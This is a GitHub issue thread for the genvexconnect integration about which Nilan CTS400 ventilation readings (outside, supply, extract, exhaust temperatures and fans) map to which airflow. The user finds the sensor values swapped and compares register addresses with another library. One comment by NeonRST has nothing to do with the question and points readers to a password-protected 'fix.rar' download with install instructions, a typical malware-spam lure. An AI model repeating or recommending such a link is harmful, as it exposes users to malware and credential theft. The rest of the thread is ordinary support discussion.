### ISSUE TITLE
Explanation on temperature/fan directions

### ISSUE THREAD

**Issue by HairingX** [superrob/genvexconnect#7]
Is it possible to get a description on the fan and temperature sensor directions?

I am having a bit of trouble placing the sensors/fans on my UI. 

![image](https://github.com/user-attachments/assets/83010df2-b127-4d40-ab2d-982ce758daad)

Is this correct?
Outside temperature is air sent from outside to hvac? (T1)
Extract temperature is air sent from hvac to room? (T2)
Exhaust temperature is air sent from room to hvac? (T3)
Supply temperature is air sent from hvac outside? (T4)

Fan speed extract is air sent from room to hvac/outside?
Fan speed supply is air sent from hvac/outside to room?

Maybe you could help with clarifying the sensor placement with the t1, t2, t3 and t4 markings on the image attached.
As well as the fans. It would be very appreciated. 

![image](https://github.com/user-attachments/assets/5bf1b834-03e3-4d0a-9828-2d59726db0d0)

If the above is not correct for my CT500/CTS400 unit, I might have to look at sensor placements.

**Comment by superrob** [comment]
Supply air is the air from HVAC to room
Extract is from the room to HVAC
Exhaust is from HVAC to outside
Outside is outside to HVAC

Your numbers look perfectly normal if your bypass is open.

**Comment by NeonRST** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by HairingX** [comment]
The values i get does not match the Nilan app values.

This image is showing my bypass open:
![image](https://github.com/user-attachments/assets/447a91f1-99fd-4cef-ae95-69f27575e9db)

The nilan app shows my temperatures as:
T1 Outdoor - 16deg
T3 Extract - 22deg

I think values might be switched around.

The Extract sensor drops when bypass is opened
![image](https://github.com/user-attachments/assets/a901d6ec-0a44-46c4-887c-f41f43a5b733)

The Exhaust sensor remains at room temp even during bypass
![image](https://github.com/user-attachments/assets/fbe5a1a5-4939-44b5-bc23-98e4a7537b10)

The Supply sensor increases when bypass is opened
![image](https://github.com/user-attachments/assets/a29acf98-aaab-4b12-9163-50916d17c004)

The Outside sensor seems correct
![image](https://github.com/user-attachments/assets/9594164b-2059-4998-99bb-a8a4e872ab43)



It seems like the
Supply (T2) has the value for Exhaust (T4)
Extract (T3) has the value for Supply (T2)
Exhaust (T4) has the value for Extract (T3)

**Comment by HairingX** [comment]
Just a bit more info, if it helps
Left image is bypass closed, right one is bypass opened
![image](https://github.com/user-attachments/assets/bd7ada48-a22b-43e4-8174-723e2d572282)

**Comment by HairingX** [comment]
It seems like the addresses in the GenvexNabtoCTS400 for the sensors does not match the addresses in the other Nilan libraries.
From what i can find, ex. [https://github.com/nic6911/ESP32_Modbus_Module/blob/main/esphome_example_code/Nilan_cts400.yaml](url) has the addresses that matches my test results (image placed last in this comment)


![image](https://github.com/user-attachments/assets/518e240f-780e-47ae-b88d-7b6b329c985a)




![image](https://github.com/user-attachments/assets/f36731a4-b9ea-4a7c-9e40-2e016b58f212)
